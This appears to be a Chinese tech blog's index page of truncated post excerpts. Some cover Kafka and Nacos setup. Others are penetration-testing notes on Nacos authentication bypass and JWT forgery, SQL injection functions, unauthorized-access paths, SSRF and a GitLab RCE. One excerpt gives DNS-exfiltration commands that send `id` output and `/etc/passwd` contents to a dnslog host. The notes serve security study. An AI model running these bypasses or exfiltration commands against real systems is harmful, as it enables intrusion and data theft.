1.概念
2.新建项目
新建空项目
然后新建模块Spingboot
添加依赖
如果发现不能构建maven,可手动添加
3.编辑配置文件
application.yml
123456789101112131415spring: application: # 应用名称 name: spring-boot-01-kafka-base # kafka连接地址 ip+port kafka: bootstrap-servers: 192.168.100.129:9092 # 配置生产者(共24个) # producer: # 配置消费者(共24个) # consumer:
4.发送消息1234567891011121314151617package com.gaomu.producer;import jakarta.annotation.Resource;import org.springframework.kafka.core.KafkaTemplate;import org.springframework.stere ...
网络安全
未读Nacos
环境搭建
https://github.com/alibaba/nacos
启动路径 nacos/nacos-2.3.2/bin
启动命令
1$ ./startup.sh -m standalone
默认端口号 8888
1.默认口令
访问http://ip:8848/nacos/#/login进入登陆页面
默认口令为nacos/nacos
2.浏览器代理身份绕过(nacos<1.4.1)
将User-Agent: 更改为 Nacos-Server 即可绕过身份认证
以下为用户查询接口
添加用户接口
POST /nacos/v1/auth/users?username=takake&password=123456 HTTP/1.1
3.JWT伪造身份绕过(0.1.0<=nacos<=2.2.0)3.1.原理
nacos通过jwt进行身份认证,由于配置文件中存在默认jwt签名密钥,由于开发者安全意 ...
1.nacos安装配置
在github官网下载:https://github.com/alibaba/nacos
将文件包解压
在bin中使用startup文件进行启动,需要java8+环境
默认以集群方式启动,单机启动命令:
1$ ./startup.sh -m standalone
配置授权token
123456nacos.core.auth.enabled=truenacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789nacos.core.auth.server.identity.key=adminnacos.core.auth.server.identity.value=admin123nacos.console.ui.enabled=true
2.nacos集成springboot
直接获取nacos中值
1234567891011121314151617 <parent& ...
1.kafka下载和安装
下载地址
https://kafka.apache.org/downloads
直接下载.tgz 解压即安装完成
1$ tar -xvf kafka_2.13-3.7.1.tgz
2.启动运行2.1.通过zookeeper启动
通过zookeeper 启动 kafka
1234567891011121314# 先启动zookeeper 先进入目录下得bin目录$ ./zookeeper-server-start.sh ../config/zookeeper.properties &# 关闭zookeeper $ ./zookeeper-server-stop.sh ../config/zookeeper.properties# 启动kafka$ ./kafka-server-start.sh ../config/server.properties &# 关闭kafka$ ./kafka-server-stop.sh ../config/server.properties# 可以使用命令查看端口是否开启$ netstat -nlpt
...
网络安全
未读1.通用查询1.1.函数
concat(arg1,arg2,arg3); arg可拼接字符串或者查询语句或列名
group_concat(arg); 用于将当列中的所有数据拼接成一组返回
concat_ws(str1,arg1,arg2,arg3);使用str1将参数中的三个数据进行拼接
substr(str,argint1,argint2);表示字符串截取, argint1表示截取开始索引,argint2,表示截取长度,索引从1开始
mid,substr的完美替代品
123select mid((select database()),1,1);select mid((select database()) from 1 for 1);
ascii(arg), 用于字符返回的ascii码,返回数字,常用于二分法。可使用ord替代
extractvalue(1,concat(0x7e,(arg),0x7e));arg为查询参数,最长有效字符为32位
updatexml(1,concat(0x7e,(arg),0x7e),1);和上面同理
exp(arg); exp报错函数
slee ...
1.简介
在很多时候我们拿到一个RCE漏洞时可能存在没有回显的利用链,那么在这时,就需要我们通过出网,将我们执行命令的结果外带出来,以此来观察执行命令的结果。
其中我们主要是通过输入“$(cmd)”可以将执行命令的结果以请求参数的形式外带出来。
2.外网dnslog获取dnslog https://dnslog.cn/
1234567891011121314151617181920$ dig $(echo -n $(id) | base64 | head -c 63).g8mpq4.dnslog.cn# 命令解读, dig 解析域名 ,$() 调用返回结果作为参数调用,id 需要命令执行字符串,BASE64 将$(id)执行的结果进行BASE64编码,便于传输,head -c 63 只输出前0-63个字符,如果不足则全部输出# 如果说只需要取其中一段命令结果$ echo -n $(cat /etc/passwd) | base64 | head -c 127 | cut -c 64-# 这样就可以取到64到127的BASE64的字符串了,cut -c 64- 表示从第64个字符开始到 ...
网络安全
未读常见未授权访问漏洞利用1.Druid 未授权访问
Druid是阿里巴巴数据监控的一个软件。
1.1.路径地址
/druid/index.html
1.2.如何利用
可能未授权,在后续版本中可能需要登陆,因此可以尝试弱口令。
进入页面后,在首页中可以看到jdk的版本信息,后续如果要进行JNDI注入的话有利于利用链的选择。
我们还需要着重关注两个点,一个是URI监控,一个是Seesion监控
在URI监控中可以看到,该系统访问过接口的历史记录,这些接口都可以进行Fuzz测试。
在Session监控中我们可以看到,系统中存储的session历史记录,可以将这些session和URI中的接口组合起来进行测试。
因此可以编写爬虫或者利用burp inturder工具将这些这些数据爬取出来在工具中跑。
2.Swagger UI 未授权访问
Swagger ui 是一个用于设计、构建、文档化和使用RESTFUL风格的Web服务的开源框架。
2.1.路径地址
/swagger/v1/swagger.json
/do ...
网络安全
未读SSRF漏洞详解以下是关于 SSRF(Server-Side Request Forgery,服务端请求伪造) 漏洞的详细解析,涵盖原理、危害、利用场景、防御方法等内容。
一、SSRF 漏洞基础概念定义:SSRF 是一种攻击者通过构造恶意请求,诱导服务器端发起非预期的网络请求的漏洞。攻击目标通常是服务器本身或内网资源,利用服务器作为“代理”访问受限资源。
核心问题:服务器未对用户输入的 URL 或参数进行严格校验,直接用于发起网络请求(如 HTTP、FTP、Redis 协议等)。
二、SSRF 攻击原理
攻击流程
1攻击者构造恶意请求 → 服务器接收请求 → 服务器发起非预期请求 → 访问敏感资源或服务
常见触发点
用户输入 URL 参数(如图片下载、网页抓取、API 调用)。
服务器功能依赖外部资源(如 OAuth 授权、XML 解析)。
云服务元数据接口(如 AWS/Aliyun 的 169.254.169.254)。
三、SSRF 的危害场景
访问内网服务
扫描内网端口和服务(如 Redis、MySQL、Consul 等未授权服务)。
攻击 ...
1.RMI服务调用
RMI的功能
服务端:将远程对象绑定到注册表(Registry),并发布一个唯一的名称(如 rmi://host:port/ServiceName)。
客户端:通过注册表查找远程对象的引用(Stub),获取调用入口。
1.1.写一个RMIdemo
那么我们现在先写一个远程对象的demo
远程对象接口
1234567import java.rmi.Remote;import java.rmi.RemoteException;public interface IRemoteObj extends Remote { public String sayHello(String keywords) throws RemoteException;}
远程对象实现
123456789101112131415import java.rmi.RemoteException;import java.rmi.server.UnicastRemoteObject;public class RemoteObjImpl extends Unicas ...
1.漏洞简介CVE-2021-22205 漏洞详解CVE-2021-22205 是 GitLab 中的一个严重远程代码执行(RCE)漏洞,攻击者可以通过上传特制的恶意图片文件,利用 GitLab 对图像文件解析的缺陷,在目标服务器上执行任意命令。该漏洞的 CVSS 评分为 9.9,影响范围广泛,危害极大。
1. 漏洞背景GitLab 是一个基于 Web 的 DevOps 生命周期工具,提供 Git 存储库管理、持续集成和部署等功能。该漏洞的核心问题在于 GitLab 的 ExifTool 组件未能正确处理传入的图像文件,导致攻击者可以通过上传恶意图片文件触发远程代码执行。
2. 漏洞原理漏洞的核心在于 GitLab 对图像文件的解析机制:
ExifTool 解析缺陷:
GitLab 使用 ExifTool 解析上传的图像文件,但未对文件内容进行严格验证。
攻击者可以通过构造包含恶意代码的 DjVu 格式图片文件,利用 ExifTool 的解析逻辑触发命令执行。
恶意文件构造:
攻击者使用 DjVu 格式的图片文件,并在文件中嵌入恶意 OGNL(Object-Graph N ...